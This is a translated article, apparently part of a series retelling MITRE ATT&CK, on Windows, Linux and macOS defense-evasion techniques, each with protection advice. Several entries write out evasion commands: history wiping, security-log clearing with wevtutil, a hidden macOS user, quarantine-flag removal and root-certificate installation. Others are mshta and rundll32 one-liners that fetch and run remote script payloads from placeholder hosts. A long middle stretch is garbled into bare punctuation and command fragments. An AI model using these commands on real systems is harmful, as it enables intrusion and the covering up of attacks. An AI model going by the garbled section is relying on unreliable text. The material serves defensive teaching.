Defense Evasion

Links to all parts:
Part 1. Getting Initial Access
Part 2. Execution
Part 3. Persistence
Part 4. Privilege Escalation
Part 5. Defense Evasion
Part 6. Obtaining Credential Access
Part 7. Discovery
Part 8. Lateral Movement (Lateral Movement)

The “Protection Bypass” section describes techniques by which an attacker can hide malicious activity and prevent its detection by means of protection. Different variations of techniques from other sections of the attack chain that help overcome specific defenses and preventive measures taken by the defending party are included in the protection bypass techniques. In turn, protection bypass techniques are used in all phases of an attack.

The author is not responsible for the possible consequences of the application of the information contained in the article, and also apologizes for any inaccuracies in some formulations and terms. The published information is a free recount of the content of MITER ATT & CK .

Handling access tokens (Access Token Manipulation)

System: Windows
Rights: User, Administrator
Description: Attackers can use access tokens (Access Token) to perform their actions in various user or system security contexts, thus avoiding the detection of malicious activity. An adversary can use the Windows API functions to copy access tokens from existing processes (Token stealing), for this it must be in the context of a privileged user (for example, an administrator). Theft of access tokens is typically used to elevate privileges from administrator level to System level. An adversary can also use the account access token to authenticate the remote system if the account has the necessary permissions on the remote system. There are three main ways to abuse access tokens.
')
Theft and impersonation of tokens.
Token impersonation is the ability of the OS to start threads in a security context other than the context of the process to which this thread belongs. In other words, impersonating tokens allows you to perform any actions on behalf of another user. An adversary can create a duplicate access token using the DuplicateTokenEX function and use ImpersonateLoggedOnUser to call the stream in the context of the logged in user or use SetThreadToken to assign an access token to the stream.

Creating a process using an access token.
An attacker can create an access token using the DuplicateTokenEX function and then use it with CreateProcessWithTokenW to create a new process running in the context of the impersonated user.

Obtaining and impersonating access tokens.
The opponent, having a username and password, can create a login session using the LogonUser API function, which will return a copy of the session access token of the new session, and then, using the SetThreadToken function , assign the resulting token to the stream.
Metasploit Meterpreter and CobaltStrike have tools for manipulating access tokens to increase privileges.

Protection recommendations: In order to fully use the tactics described above, an attacker must have system administrator rights, so do not forget to limit the privileges of ordinary users. Any user can trick access tokens if they have valid credentials. Restrict the ability of users and groups to create access tokens:

GPO: Computer Configuration> [Policies]> Windows Settings> Security Settings> Local Policies> User Rights Assignment: Create a token object .

Also determine who can replace local or network service process tokens:
GPO: Computer Configuration> [Policies]> Windows Settings> Security Settings> Local Policies> User Policy Assignment: Replace a process level token.

Creating BITS Jobs (BITS Jobs)

System: Windows
Rights: User, Administrator, System
Description: Windows Background Intelligent Transfer Service (BITS) is an asynchronous file transfer mechanism through the Component Object Model (COM) using low bandwidth. BITS is usually used by update programs, instant messengers and other applications that prefer to run in the background without interrupting the work of other network applications. File transfer tasks are represented as BITS tasks that contain a queue of one or more file operations. The interface for creating and managing BITS tasks is available in the PowerShell and BITSAdmin tool. Attackers can use BITS to download, run, and clean up after running the malicious code. BITS tasks are stored autonomously in the BITS database, and no new files or registry entries are created in the system, BITS is often allowed by the firewall. Using BITS tasks, you can gain a foothold in the system by creating lengthy tasks (90 days by default) or by calling an arbitrary program after completing a BITS task or an error (including after restarting the OS).

Protection recommendations: BITS is a standard OS functionality, the use of which is difficult to distinguish from malicious activity, therefore, the protection vector should be aimed at preventing the attacker from launching tools at the beginning of the attack chain. A complete disabling of BITS can lead to the termination of updating legitimate software, but you can consider limiting access to the BITS interface for specific users and access groups, you can also limit the lifetime of BITS tasks, which is set by changing the following keys:

• HKEY_LOCAL_MACHINE \ Software \ Policies \ Microsoft \ Windows \ BITS \ JobInactivityTimeout;
• HKEY_LOCAL_MACHINE \ Software \ Policies \ Microsoft \ Windows \ BITS \ MaxDownloadTime .

Binary padding data (Binary Padding)

System: Windows, Linux, macOS
Description: Some security tools scan files by searching for static signatures. Opponents can add data to malicious files in order to increase their volume to a value exceeding the maximum allowed size of the scanned file or to modify the hash of the file in order to bypass the black lists of blocking the launch of files by hashes.

Security Tips : Provide identification of potentially dangerous software by using tools such as AppLocker , whitelisting tools and software restriction policies.

Bypass User Account Control

System: Windows
Rights: User, Administrator
Description: There are many ways to circumvent UAC, the most common of which are implemented in the UACMe project. New ways of circumventing UAC are regularly detected, similar to the abuse of the eventvwr.exe system application, which can execute a binary file or script with elevated privileges. Malicious programs can also be embedded in trusted processes, with which UAC allows privilege escalation without prompting the user.

To bypass UAC using eventvwr.exe in the Windows registry, the key is modified:
[HKEY_CURRENT_USER] \ Software \ Classes \ mscfile \ shell \ open \ command .

To bypass UAC using sdclt.exe, the keys in the Windows registry are modified:
[HKEY_CURRENT_USER] \ Software \ Microsoft \ Windows \ CurrentVersion \ App Paths \ control.exe;
[HKEY_CURRENT_USER] \ Software \ Classes \ exefile \ shell \ runas \ command \ isolatedCommand.

Security Tips : Remove users from the local Administrators group on the protected systems. If possible, enable the highest level of protection in the UAC settings.

CMSTP (AppLocker ByPass - CMSTP)

System: Windows
Rights: User
Description: Microsoft Connection Manager Profile Installer (cmstp.exe) is the "Connection Manager Profile Installer" built into Windows. Cmstp.exe can take an inf-file as a parameter, so an attacker can prepare a special malicious INF for loading and executing DLLs or scriptlets (* .sct) from remote servers, bypassing AppLocker and other locks, because cmstp.exe is signed with a Microsoft digital certificate.

Protection recommendations: Blocking the launch of potentially dangerous applications. Monitoring or complete blocking of C: \ Windows \ System32 \ cmstp.exe launches .

Clear Command History (Clear Command History)

System: Linux, macOS
Rights: User
Description: For the convenience of users, all commands executed by the user in the terminal are logged in macOS and Linux systems. Users can quickly execute the command they performed earlier in another session. When a user logs in, the command history is saved to the file that is specified in the HISTFILE variable. When a user logs out, the command history is saved to the user's home directory ~ / .bash_history. The command history file may also contain passwords entered by the user in clear text. Criminals can either search for passwords in command history files or use measures to prevent their malicious activity from being recorded in the command history, for example:

unset HISTFILE;
export HISTFILESIZE = 0;
history -c;
rm ~ / .bash_history.

Protection recommendations: Preventing users from deleting or writing bash_history files can prevent the adversary from abusing these files, and restricting user rights to editing the HISTFILE and HISTFILESIZE variables will ensure that the command execution log is saved.

Code Signing

System: Windows, macOS
Description: The digital signature of the code provides developer authentication and a guarantee that the file has not been changed. However, as you know, opponents can use signatures to disguise malware as legitimate binaries. Certificates for digital signatures can be created, tampered with or stolen by an attacker. Signing code to check the software for the first time is used in Windows, macOS, OS X and is not used in Linux due to the decentralized structure of the platform. Code signing certificates can be used to bypass security policies that require that only signed code be executed on the system.

Protection recommendations: The use of software “white lists” and the choice of reliable software publishers before verifying a digital signature can prevent the execution of malicious or unreliable code in the protected system.

Component Firmware

System: Windows
Rights: System
Description: Some attackers can use complex tools to compromise computer components and install malicious firmware on them, which will run malicious code outside the operating system or even the main system firmware (Bios). The technique is the firmware of computer components that do not have a built-in system for checking the integrity of, for example, hard drives. A device with malicious firmware can provide constant access to the attacked system despite failures and overwriting of the hard disk. The technique is designed to overcome software protection and integrity control.

Interception of links and communications COM (Component Object Model Hijacking)

System: Windows
Rights: User
Description: Microsoft Component Object Model (COM) is a technology for creating software based on interacting object components, each of which can be used in many programs simultaneously. Attackers can use COM to insert malicious code that can be executed instead of legitimate via the capture of COM links and connections. To intercept a COM object, you must replace the reference to the legitimate system component in the Windows registry. If you further call this component, the malicious code will be executed.

Protection recommendations: Preventive measures to prevent this attack are not recommended, as COM objects are part of the OS and software installed in the system. Locking changes to COM objects can affect the stability of the operating system and software. It is recommended to direct the protection vector to block malware and potentially dangerous software.

Control Panel Items (Windows Control Panel Items)

System: Windows
Rights: User, Administrator, System
Description: The tactic is the use by attackers of Windows Control Panel elements to execute arbitrary commands as a payload (for example, the Reaver virus). Malicious objects can be disguised as standard controls and delivered to the system using phishing attachments. Utilities for viewing and configuring Windows settings are registered exe-files and CPL-files of Windows control panel elements. CPL files are actually renamed DLLs that can be run in the following ways:

• directly from the command line: control.exe <file.cpl> ;
• using API functions from shell32.dll: rundll32.exe shell32.dll, Control_RunDLL <file.cpl> ;
• double click on the cpl file.

Registered CPLs stored in System32 are automatically displayed in the Windows Control Panel and have a unique identifier stored in the registry:

HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Explorer \ ControlPanel \ NameSpace

Information about other CPLs, for example, the display name and the path to the cpl file are stored in the “Cpls” and “Extended Properties” sections of the section:

HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Control Panel

Some command line shell CPLs are registered in the section:

HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Controls Folder \ {name} \ shellex \ PropertySheetHandlers

Protection Recommendation: Limit the launch and storage of control panel item files only in protected folders (for example, C: \ Windows \ System32 ), enable User Account Control (UAC) and AppLocker to prevent unauthorized changes to the system. Of course, the use of anti-virus software.

DCShadow

System: Windows
Rights: Administrator
Description: DCShadow assumes the creation of a fake domain controller in the attacked network with the help of which an attacker can change the AD data, including changes to any domain object, credentials and keys unnoticed for SIEM systems, using the API functionality to interact with the attacked CD. Tools for the implementation of the attack is part of mimikatz. DCShadow can be used to perform SID-History injection attacks and to create backdoors for the purpose of further consolidation in the system.

Protection recommendations: Considering that the DCShadow technique is based on the abuse of the design features of AD, the protection vector should be aimed at preventing the launch of attack implementation tools. You can detect an attack by analyzing the network traffic of CD replication, which runs every 15 minutes, but can be triggered by an off-schedule attacker.

DLL search interception (DLL Search Order Hijacking)

System: Windows
Rights: User, Administrator, System
Description: The technique is to exploit the vulnerabilities of the application's search algorithm for the DLL files they need to work ( MSA2269637 ). Often, the DLL search directory is the working directory of the program, so attackers can replace the original DLL with a malicious one with the same file name.

Remote attacks on DLL search can be carried out when the program installs its current directory in a remote directory, for example, a network share. Also, attackers can directly change the way the DLL is searched and loaded by replacing the .manifest or .local files that describe the DLL search parameters. If the attacked program works with high privileges, then the malicious DLL loaded by it will also be executed with high rights. In this case, the technique can be used to elevate privileges from the user to the administrator or System.

Security Tips: Disable remote boot DLL (enabled by default in Windows Server 2012+ and is available with updates for XP + and Server 2003+). Enable the secure search mode of the DLL, which will limit the search directories to directories such as % SYSTEMROOT% before performing a DLL search in the current application directory.

Enable Secure Search DLL:
Computer Configuration> [Policies]> Administrative Templates> MSS (Legacy): MSS: (SafeDllSearchMode) Enable Safe DLL search mode.
Corresponding registry key:
HKLM \ SYSTEM \ CurrentControlSet \ Control \ Session Manager \ SafeDLLSearchMode.

Consider the feasibility of auditing the protected system to eliminate DLL weaknesses using tools such as the PowerUP module in PowerSploit. Do not forget about blocking malicious and potentially dangerous software, as well as the implementation of Microsoft recommendations .

Side loading DLL (Side-Loading DLL)

System: Windows
Description: The attack is based on the vulnerabilities of Side-by-Side parallel execution technology (WinSxS or SxS), the essence of which is to provide the ability to run applications using incompatible versions of the same code components. The component assembly repository is located in the c: \ windows \ winsxs folder. Each assembly must have a manifest associated with it — an xml file containing information about files, classes, interfaces, libraries, and other elements of the assembly. Like the DLL search capture techniques, opponents can trigger a user application to side load a malicious DLL, the path to which was specified in the assembly manifest file.

% TEMP% \ RarSFX% \% ALLUSERS PROFILE% \ SXS;
% TEMP% \ RarSFX% \% ALLUSERS PROFILE% \ WinSxS.

Protection recommendations: Regular software updates, installation of applications in write-protected directories. Use the sxstrace.exe program to check manifest files for side loading vulnerabilities.

Deobfuscation / decryption of files or information (Deobfuscate / Decode Files or Information)

System: Windows
Rights: User
Description: Attackers can use file obfuscation and information to hide malicious code and artifacts remaining from the invasion. To use such files, opponents use reverse techniques to deobfuscate / decode files or information. Such methods may involve the use of malicious software, various scripts or system utilities, for example, there is a known method of using the certutil utility to decode an executable file of a remote access tool hidden inside a certificate file. Another example is using the copu / b command to collect binary fragments into a payload (payload).

Payload files can be compressed, archived or encrypted to avoid detection. Sometimes, deobfuscation or decryption may require user action (User execution). The user may need to enter a password to open a compressed or encrypted file or script with malicious content.

Security Tips : Identifying and blocking unnecessary system utilities or potentially dangerous software that can be used to deobfuscate or decrypt files using tools such as AppLocker and software restriction policies.

Disabling Security Tools

System: Windows, Linux, macOS
Description: Attackers can disable various security tools, destroy event logging processes, registry keys, prevent security tools from starting during malicious activity, or use other methods to interfere with the operation of security scanners or event reports.

Security Tips : Ensure that permissions for processes, registry, and files are properly configured to prevent unauthorized disabling or tampering with security features.

Exploitation for Defense Evasion Exploitation

System: Windows, Linux, macOS
Rights: User
Description: As with any software, security software may have vulnerabilities that could be used by an attacker to disable or circumvent them.

Protection Recommendations: Regular software updates, development and implementation of a software vulnerability management process. The use of virtualization and micro-segmentation of applications can reduce the risks of possible exploitation of vulnerabilities.

EWM injection (Extra Window Memory Injection)

System: Windows
Rights: Administrator, System
Description: The technique is the abuse of additional Windows memory, the so-called Extra Window Memory (EWM). The EWM size is 40 bytes, suitable for storing a 32-bit pointer, and is often used to refer to procedures. Malicious programs during the attack chain can place a pointer to malicious code in EWM, which will then be launched by the process of an infected application.

Protection recommendations: Considering that EWM injection techniques are based on the misuse of OS development features, protection efforts should be directed at preventing the launch of malicious programs and malicious tools. It is good practice to identify and block potentially dangerous software using AppLocker, organizing an application whitelist, or applying Software Restriction Policies software restriction policies.

File Deletion

System: Windows, Linux, macOS
Rights: User
Description: Various tools, malware and other files used by the adversary can leave traces of hacking activity in the system. Attackers can delete these artifact files during an invasion to reduce the likelihood of an attack being detected or delete them at the end of their operation. An adversary can use both special tools for guaranteed information destruction (for example, Windows Sysinternals Sdelete), as well as tools built into the OS, for example, DEL and ipher.

Protection recommendations: If possible, block the launch of unnecessary system utilities, third-party tools and potentially dangerous software that can be used to destroy files.

Reading Files with File System Logical Offsets

System: Windows
Rights: Administrator
Description: Windows can allow programs to directly access logical volumes. Programs with direct access can read and write files directly to the hard disk, analyzing the data structure of the file system. This method bypasses file access controls and file system monitoring. Utilities such as NinjaCopy are used to perform the above actions in PowerShell.

Protection recommendations: Blocking potentially dangerous software.

Gatekeeper Bypass Bypass

System: macOS
Rights: User, Administrator
Description: Gatekeper technology is used in macOS and OS X, which ensures that only trusted software is launched. When downloading an application from the Internet, a special attribute is set in the com.apple.quarantine file, which indicates that the Gatekeeper should ask the user for permission to execute the downloaded file. The flag is set before saving the file to disk, then when the user tries to open the file, the Gatekeeper checks for the presence of the corresponding flag and, if there is one, the system will prompt the user to confirm the launch and show the URL from which the file was downloaded. Applications downloaded to the system from a USB drive, optical, child or network drive will not cause the flag in the com.apple.quarantine file. Some utilities and files that hit the system under attack during shadow boot (Drive-by-compromise technique) also do not trigger the flag setting for the Gatekeeper, thus bypassing the power of attorney verification. The presence of the quarantine flag can be checked with the command: xattr /path/to/MyApp.app .

You can also remove the flag with attr, but this will require elevated privileges:
sudo xattr -r -d com.apple.quarantine /path/to/MyApp.app

Security Tips : In addition to Gatekeeper, you should use a ban on launching applications downloaded from outside of AppleStore.

HISTCONTROL variable

System: Linux, macOS
Rights: User
Description: The HISTCONTROL environment variable represents the list of parameters for saving the command history to the ~ / .bash_history file when a user logs off. For example, the ignorespace option indicates that you do not need to save lines starting with a space, and the ignoredups option will disable saving repeated commands in a row. On some Linux systems, the default option is the ignoreboth option, which includes the above two options. This means that the "ls" command will not be saved in history, unlike "ls".

HISTCONTROL is not used by default in macOS, but can be customized by the user. Attackers can use the features of the HISTCONTROL parameters in order not to leave traces of their activities simply by inserting spaces in front of commands.

Security Tips : Prevent users from changing the HISTCONTROL variable, and also make sure that HISTCONTROL is set to ignoredup and does not contain the ignoreboth and ignorespace options.

Hidden files and folders (Hidden Files and Directories)

System: Windows, Linux, macOS
Rights: User
Description: On Windows, users can hide files using the attrib command. It is enough to specify the attribute + h <file name> to hide the file or "+ s" to mark the file as system. By adding the "/ S" parameter, the attrib utility will apply the changes recursively. In Linux / Mac, users can hide files and folders simply by typing a "." At the beginning of the file name. After this, the files and folders will be hidden from the Finder application and such as the ls utility.

In macOS, files can be marked with the UF_HIDDEN flag, which will turn on the prohibition of their visibility in Finder.app, but will not prohibit seeing hidden files in Terminal.app. Many applications create hidden files and folders so as not to clutter up the user's workspace. For example, SSH utilities create a hidden .ssh folder that stores a list of known hosts and user keys.

Attackers can use the ability to hide files and folders, so as not to attract the attention of users.

: — .

(Hidden Users)

: macOS
: , root
: macOS userID, . /Library/Preferences/com.apple.loginwindow Hide500Users , 500 . , <500 Hide500Users :

sudo dscl. -create /User/username UniqueID 401
sudo defaults write /Library/Preferences/com.apple.loginwindow Hide500Users -bool TRUE

: , . , /Library/Preferences/com.apple.loginwindow.

(Hidden Window)

: macOS
:
: macOS OS X plist- . apple.awt.UIElement Java- Dock. , , .

: , plist- apple.awt.UIElement.

IFEO- (Image File Execution Options Injection)

System: Windows
: , System
: Image File Execution Options (IFEO) , :

• HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options/[executable]
• HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\[executable] , [executable] — .

, [executable] , . IFEO , , .

: , - , , . IFEO- . Debug_process Debug_only_this_process .

(Indicator Blocking)

System: Windows
: , . , .

, . , , , , , .

: , , . , .

(Indicator Removal from Tools)

System: Windows, Linux, macOS
: , (), , , , . . , - / , , .

: . , .

- , AppLocker .

. IDS-, .. , «» . , , , .

(Indicator Removal on Host)

System: Windows, Linux, macOS
: , , , . , Windows Event Linux/macOS, /.bash_history .var/log/*.

, , , , . - .

Windows Event Logs
Windows Event Logs — . Microsoft « , ». : , .
, , , , .. , .
:
wevtutil cl system;
wevtutil cl application;
wevtutil cl security.
, PowerShell.

: , . , . , , , . . 1102: « ».

(Indirect Command Execution)

System: Windows
:
: Windows, cmd. , Forfiles, (pcalua.exe), Windows Linux (WSL), , «» .

, , , , CMD.

: - AppLocker . , .

(Install Root Certificate)

System: Windows, Linux, macOS
: ,
: (CA). , . TLS/SSL -. , , . .

. , HTTPS -, .
« » , TLS/SSL.
. , .

macOS Ay MaMi /usr/bin/security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System/keychain path/to/malicious/cert .

: HTTP Public Key Pinning (HPKP) — . HPKP , , .

Windows (HKCU):

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\Root\ProtectedRoots\Flags = 1.

, . Microsoft authroot.stl. Sysinternals Sigcheck (Sigcheck[64].exe -tuv) Microsoft Certificate Trust List.

:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Root\Certificates
HKEY_LOCAL_MACHINE [HKEY_CURRENT_USER] \SOFTWARE[\Policies]\Microsoft\SystemCertificates\Root\Certificates

Windows- , :

• 18F7C1FCC3090203FD5BAA2F861A754976C8DD25;
• 245C97DF7514E7CF2DF8BE72AE957B9E04741E85;
• 3B1EFD3A66EA28B16697394703A72CA340A05BD5;
• 7F88CD7223F3C813818C994614A89C99FA3B5247;
• 8F43288AD272F3103B6FB1428485EA3014C0BCFE;
• A43489159A520F0D93D032CCAF37E7FE20A8B419;
• BE36A4562FB2EE05DBB3D32323ADF445084ED656;
• CDD4EEAE6000AC7F40C3802C171E30148030C072.

InstallUtil

System: Windows
:
: InstallUtil — Windows, , .NET Framework. Installutil VisualStudio. InstallUtil.exe Microsoft :

C:\Windows\Microsoft.NET\Framework\v[version]\InstallUtil.exe

InstallUtil - .

: InstallUtil, InstallUtil.exe.

LC_MAIN Hijacking

: macOS
: ,
: OS X 10.8 mach-O LC_MAIN, . LC_THREAD LC_UNIXTHREAD. , , . , .

: , . LC_MAIN .

Launchctl

: macOS
: ,
: Launchctl — Launchd. C Launchctl (LaunchDeamons LaunchAgents), . Launchctl , :

launchctl submit -l [labelname] — /Path/to/thing/to/execute ''arg" ''arg" ''arg" .

, launchctl , , .

: Launch Agents Launch Deamons . KnockKnock , launchctl Launch Agents Launch Deamons.

(Masquerading)

System: Windows, Linux, macOS
: , , . .
, , . . , , .

Windows
— , rundll32.exe. , , .
Windows C:\Windows\System32. , explorer.exe svchost.exe .

Linux
, , . Linux /bin, rsyncd dbus-inotifier.

: . . , C:\Windows\System32. .

- , .

(Modify Registry)

System: Windows
: , , system
: .

. Reg . , Windows API.

, , . Reg API . , , .

, Remote Regisry service. , , Windows Admin Shares RPC.

: , ( Service Registry Permissions Weakness ). , . , . (Event ID4657), , , RegHide, .

Mshta

System: Windows
:
: Mshta.exe ( C:\Windows\System32\ ) — , Microsoft HTML (*.HTA). HTA- , InternetExplorer, . , Mshta mshta.exe - HTA-, Javascript VBScript. :

mshta vbscript:Close(Execute(«GetObject(»«script:https[:]//webserver/payload[.]sct»")"))

, URL-:

mshta http[:]//webserver/payload[.]hta

: mshta.exe IE, . Mshta.exe, .

NTFS- (NTFS File Attributes)

System: Windows
Description: The NTFS partition contains the Master File Table (MFT) in which data about the contents of the volume are stored, the rows correspond to the files, and the columns of their attributes, including attributes such as Extended attributes (EA), are 64kb in row and Alternate Data Streams (ADS) - arbitrary-sized metadata that can be used to store any data. Attackers can store malicious data and binary files in extended attributes and file metadata. This technique allows you to bypass some protection tools, such as scanning tools based on static indicators and some anti-virus tools.

Security Tips: Blocking access to EA and ADS can be quite complex and impractical and, in addition, lead to unstable operation of the standard OS functionality. Direct protection vector to prevent software from starting, which can be used to hide information in EA and ADS.

Removing connections to network resources (Network Share Connection Removal)

System: Windows
Rights: Administrator, user
Description: Network folder and Windows Admin Share connections can be deleted if they are no longer required. Net is an example utility that can be used to delete network connections: net use \ system \ share / delete . Opponents can remove network connections that they do not need to clear traces of intrusion.

Security Tips: Follow best practices for organizing Windows Admin Shares. Identify unnecessary system utilities and software that can be used to connect to network shares and consider auditing its use or blocking.

Obfuscated Files or Information

System: Windows, Linux, macOS
Description: Attackers can use encryption, encryption, and various methods of obfuscating files and their contents in the system or during their transfer.
Payloads can be archived or encrypted, sometimes for their deobfuscation and subsequent launch some user action is required, for example, to enter a password to open an archive prepared by an attacker.

To hide plain text lines, parts of files can also be encoded. Payloads can be divided into separate "benign" files that, when assembled into a single unit, perform malicious functionality.

Opponents can also confuse commands called from payloads directly or via the command line interface. Environment variables, aliases, and symbols specific to the semantics of the platform or language can be used to bypass signature-based and whitelisted malware detection.

Another example of obfuscation is the use of steganography - the technique of hiding data or code in images, sound tracks, video and text files.

Recommendations for protection: Use the tools for analyzing and detecting malicious code that do not only check the source code itself, but also analyze the process of executing commands. In Windows 10, this functionality is presented in the form of the Antimalware Scan Interface (AMSI).

The presence of escape characters in commands, such as ^ or ", can serve as an indicator of obfuscation. With the help of Windows Sysmon and Event ID 4688 events, you can view the arguments of commands executed in various processes.

The obfuscation used in the payloads during the initial access stage can be detected on the network using an IDS system and email security gateways that identify compressed, encrypted data and scripts in the attached files. Detection of payloads transmitted over an encrypted connection from a website can be performed by inspecting encrypted traffic.

Plist Modification

System: macOS
Rights: User, Administrator
Description: Criminals can modify plist files by specifying their own code in them to execute it in the context of another user. The plist properties files located in / Library / Preferences run with elevated privileges, and plist from ~ / Library / Preferences run with user privileges.

Security Tips : Prevent plist files from being modified by making them read-only.

Port knocking

System: Linux, macOS
Rights: User
Description: Attackers can use the Port Knocking methods to hide the open ports that they use to connect to the system.

Security Tips : Using stateful firewalls can prevent some Port Knocking options from being implemented.

Process doppelganging

System: Windows
Rights: User, Administrator, System
Description: Transactional NTFS (TxF) is a technology introduced for the first time in Vista that allows file operations using transactions. In TxF, only one transaction descriptor can write a file at the moment, all other descriptors will be isolated and can only read the file version recorded at the moment of opening. If the system or application crashes, TxF will automatically roll back changes to the file. TxF is still enabled in Windows 10.

Technique Process Doppelganging (with German. "Two-stage transmission", "double move") involves the use of undocumented features WinAPI and is implemented in 4 steps:

1. Transaction An NTFS transaction is created using the attacked executable file, a temporary modified version of the executable file is created as part of the transaction.
2. Loading. A shared section is created in memory, into which a modified version of the executable file is loaded.
3. Rollback An NTFS transaction is rolled back, with the result that the original file being attacked is saved on the disk in its original form.
4. Animation. Using a modified version of the executable file that remains in RAM, a process is created and its execution is launched.

Thus, the malicious code will work in the context of a legitimate trusted process. Given that the attack occurs only in memory, because The NTFS transaction does not end, but “rolls back”, no traces of malicious activity will remain on the disk.

Security Tips: Preventive security measures in the form of blocking some API calls are likely to have negative side effects. The protection vector should be aimed at preventing the launch of the attacker's tools at an earlier stage in the attack chain. Doppelganging can be used to circumvent protection, but it is still good practice to block potentially dangerous applications and restrict software being used with whitelists. Attack detection is performed by analyzing calls to the CreateTransaction API functions, CreateFileTransacted, RollbackTransaction, undocumented functions like NTCreateProcessEX, NtCreateThreadEX, as well as API calls used to change memory in another process, such as WriteProcessMemory.

Process Hollowing

System: Windows
Rights: User
Description: The attack is carried out by replacing the image of the executable file of the process during the suspension of the process. Included in the top ten techniques of injection processes .

Security Tips: Preventive security measures in the form of blocking some API calls are likely to have negative side effects. The protection vector should be aimed at preventing the launch of the attacker's tools at an earlier stage in the attack chain. Process Hollowing can be used to bypass security tools, but it is still good practice to block potentially dangerous applications and restrict software being used with whitelists.

Code Injection into Process (Process Injection), Ten Process Injection Techniques

System: Windows, Linux, macOS
Rights: User, administrator, system, root
Description: Process injection is a method for executing an arbitrary code in the address space of a separate living process. Running code in the context of another process allows access to the memory of the process being injected, system / network resources, and possibly elevated privileges. Process injections can also be used to avoid possible detection of malicious activity by security tools. Techniques for implementing injections into processes are based on the abuse of various mechanisms that ensure the multithreading of program execution in the OS. The following are some approaches to performing code injection into the process.

Windows
• DLL injection. They are performed by recording the path to the malicious DLL inside the process with its subsequent execution by creating a remote thread (Remote thread is a thread that operates in the virtual address space of another process). In other words, malware writes a DLL to the disk, and then uses a function like CreateRemoteTread, which will call the LoadLibrary function in the injected process.
• PE injections (Portable executable injection) are based on the abuse of the execution features in memory of PE files, such as DLL or EXE. Malicious code is written to the process without writing any files to disk, and then using its additional code or by creating a remote stream, its execution is called.
• Thread execution hijacking includes injection of malicious code or a path to a DLL directly into the process stream. Like the Process Hollowing technique, the flow must first be suspended.
• Injections into asynchronous call procedures (Asynchronous Procedure Call (APC) injection) involve the attachment of malicious code to an APC Queue (APC Queue) process flow. One of the APC injection methods, called “Earle Bird injection”, involves creating a suspended process in which malicious code can be recorded and launched to the process entry point via APC. AtomBombing is another injection option that uses APC to invoke malicious code previously recorded in the Global atom table.
• Injections into the local storage of the stream (Thread Local Storage (TLS) injection) involve manipulating the memory pointers inside the executable PE file to redirect the process to the malicious code.

Mac and Linux
• The system variables LD_RPELOAD, LD_LIBRARY_PATH (Linux), DYLIB_INSERT_LIBRARIES (macOS X) or the dlfcn application programming interface (API) can be used to dynamically load a library (shared object) into a process, which in turn can be used to intercept API calls from running processes.
• The Ptrace system call can be used to connect to a running process and change while it is running.
• / proc / [pid] / mem provides access to the process memory and can be used to read / write arbitrary data, but this method is rarely used due to the complexity of its implementation.
• Capturing a VDSO (Virtual dynamic shared object) allows you to inject code during the execution of ELF binaries by manipulating code plugs from linux-vdso.so.
Malicious programs typically use code injection into the process to access system resources, due to which an attacker can gain a foothold in the system and perform other changes in the attacked environment. More complex samples can perform multiple injections of processes to make their detection more difficult.

Protection recommendations: Methods of code injection into processes are based on the abuse of regular OS functions, direct effects on which can lead to unstable operation of legitimate software and security products. Efforts to prevent interception techniques need to be focused on the earlier stages of the attack chain. Use tools to block potentially dangerous software, such as AppLocker. Use Yama as a preventive measure against code injection in ptrace, limiting the use of ptrace to privileged users only. Additional security measures may include the deployment of kernel security modules that provide advanced access control and process restriction. These tools include SELinux, grsecurity, AppArmor.

Redundant Access

System: Windows, Linux, macOS
Rights: User, Administrator, System
Description: Attackers can simultaneously use several remote access tools with different control protocols to diversify detection risks. So, if one of the remote access tools is detected and blocked, but the protecting party has not identified all the attacker's tools, then the remote access to the attacked network will still be preserved. Attackers can also attempt to gain access to valid accounts of remote corporate services, such as VPN, to gain alternative access to the system in the event of blocking the main tools of remote access. Using a web shell is also one of the methods of remote access to the network through a web server.

Protection recommendations: Monitor the presence and blocking of launching on your network of known remote access tools (AmmyAdmin, Radmin, RemotePC, VNC, etc.), use the application launch control tools and blocking potentially dangerous software. Implementing IDS and IPS systems that identify specific malware using signatures will reduce the likelihood of a successful attack, but over time, attackers will modify their tools to change the signature and, as a result, bypass IDS and IPS systems.

Regsvcs / Regasm

System: Windows
Rights: User, Administrator
Description: Regsvcs and Regasm are Windows utility utilities used to register in the .NET Component Object Model (COM) assembly system. Both files are digitally signed by Microsoft. Criminals can use Regsvcs and Regasm to proxy code when the code that must be run before registering or unregistering is specified as an attribute: [ComRegisterFunction] or [ComUnregisterFunction]. The code with such attributes can be run even if the process is executed with insufficient privileges or even “crashes” at startup.

Security Tips : Block Regsvcs.exe and Regasm.exe if they are not used on your system or network.

Rootkit

System: Windows, Linux, macOS
Rights: Administrator, System, root
Description: Rootkits are programs that hide the presence of malware by intercepting and modifying API calls. Rootkits can work at the user level, the OS kernel or even lower, at the hypervisor, MBR or system firmware level. Opponents use rootkits to hide the presence of programs, files, network connections, drivers, and other OS components.

Protection recommendations: Identify and block potentially dangerous software that may contain rootkits using software whitelisting tools, anti-virus tools, or built-in OS protection.

Rundll32 (Poweliks)

System: Windows
Rights: User
Description: Rundll32.exe is a system utility for running programs in dynamic link libraries that can be invoked to proxy a binary file, execute Windows control files (.cpl) through the undocumented functions of shel32.dll - Control_RunDLL and Control_RunDLLAsUser . Double-clicking on the .cpl file also causes Rundll32.exe to execute. Rundll32 can also be used to execute scripts such as javascript:

rundll32.exe javascript: "\ .. \ mshtml, RunHTMLApplication"; document.write (); GetObject ("scrirpt: https [:] // www [.] example [.] com / malicious.sct") "

The above described method of using rundll32.exe is detected by antivirus software like a virus like Poweliks.

Protection Tips: Attack Surface Reduction (ASR) in EMET and Advanced Theart Protection in Windows Defender can block the use of Rundll32.exe to bypass white lists.

SIP and Trust Provider Capture (SIP and Trust Provider Hijacking) or Subverting Trust in Windows

System: Windows
Rights: Administrator, System
